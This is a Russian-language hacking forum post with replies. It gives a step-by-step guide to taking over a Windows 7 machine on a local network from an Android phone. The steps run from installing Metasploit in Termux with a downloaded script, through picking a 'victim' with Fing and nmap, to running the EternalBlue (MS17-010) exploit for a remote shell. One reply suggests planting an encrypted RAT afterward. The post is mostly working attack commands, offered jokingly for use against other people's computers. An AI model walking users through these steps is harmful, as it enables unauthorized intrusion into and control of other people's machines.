Всё что нам для этого понадобится: Прямые руки Телефон на андроиде Fing nmap temux и metasploit или kali nethunter 1) Для начала скачаем termux из google play Теперь установим metasploit: Код: apt update Код: apt upgrade Код: apt install curl Код: curl -LO https://raw.githubusercontent.com/1Tech-X/Metasploit-/master/metasploit.sh Код: cd metasploit-framework-4.14.28 Код: ./msfconsole Знаю загрузка довольно долгая но нужно потерпеть сожми яйца в кулак и жди После всего у нас должен открыться metasploit осле того как вы установили metasploit можете считать что вы Zупер хакер и спокойно идти грабить банк или на урок информатики к Марине Сергеевне. 2) Сканирование сети c Fing Теперь посмотрим кто есть в нашей сети: Для этого удобно использовать утилиту Fing Вот так выглядит моя локальная сеть(у всех по разному): И если у вас зрение не минус 40 то можно легко увидеть "USER-ПК"(у всех всё по разному) он и будет нашей жертвой.Выбираем и запоминаем ip нашей жертвы,в моём случае это 192.168.1.104 и сканим его на порты. 3) Сканирование на открытые порты c nmap Установим этот чудесный инструмент: Код: apt-get update Код: apt-get install nmap ip нашей жертвы,в моём случае это 192.168.1.104, сканим его на порты Код: nmap ip жертвы В моём случае это: nmap 192.168.1.104 Есть бесконечное множество настроек nmap но в данный момент подойдёт эта(из за скорости) Вот что мы видим: У меня стоит на машине 7 винда и у неё открыт 445 порт,любому более менее шарящему в metasploit человеку сразу понятно что первым делом мы будем юзать эксплоит eternalblue. 4) Проверка уязвимости Дальше пойдут скрины с консоли kali nethunter так что не пугайтесь,все команды идентичны с командами в termux.(Мне так просто реально удобнее) Для начала мы протестим на сканере возьмёт ли наш эксплоит нашу жертву в metasploit вводите: Код: use auxiliary/scanner/smb/smb_ms17_010 Здесь нам нужно указать только ip адрес жертвы Код: Выглядит это так: set RHOSTS ip жертвы В моём случае это: set RHOSTS 192.168.1.104 Запускаем **** командой Код: run Если мы видим что-то подобное значит хост уязвим к эксплоиту 5) Теперь завершающая стадия:использование эксплоита В том же metasploit пишем Код: use exploit/windows/smb/ms17_010_eternalblue Здесь нам нужно указать ip жертвы и процесс Ip жертвы: Код: Выглядит это так: set RHOST ip жертвы В моём случае это: set RHOST 192.168.1.104 И процесс Код: set ProcessName explorer.exe И после того как вы помолились и поставили икону на обои можно запускать эксплоит Код: exploit Если всё удачно то тогда мы получим полный доступ к командной строке атакуемого компухтера. Всем спасибо за внимание!
Есть чо для iOS? Я знаю что metasploid есть для iOS, но он сука через терминал у меня криво ставится и в итоге не запускается(
Думал очередной гайд для тру хацкеров , а тут все понятно объяснили , можно будет найти применение на практике
И что ? Может у кого-то какой-то способ не работает, выкладываю ещё 1. В точь-точь такой темы нету чё ты доебался.
Это консоль,и тут стрима не подрубить,можно по идее сделать скрин с вебки,либо же просто уже имея доступ к компу,закинуть туда криптованный ратник и иметь уже нормальный доступ ко всему. Но все это конечно надо суметь провернуть))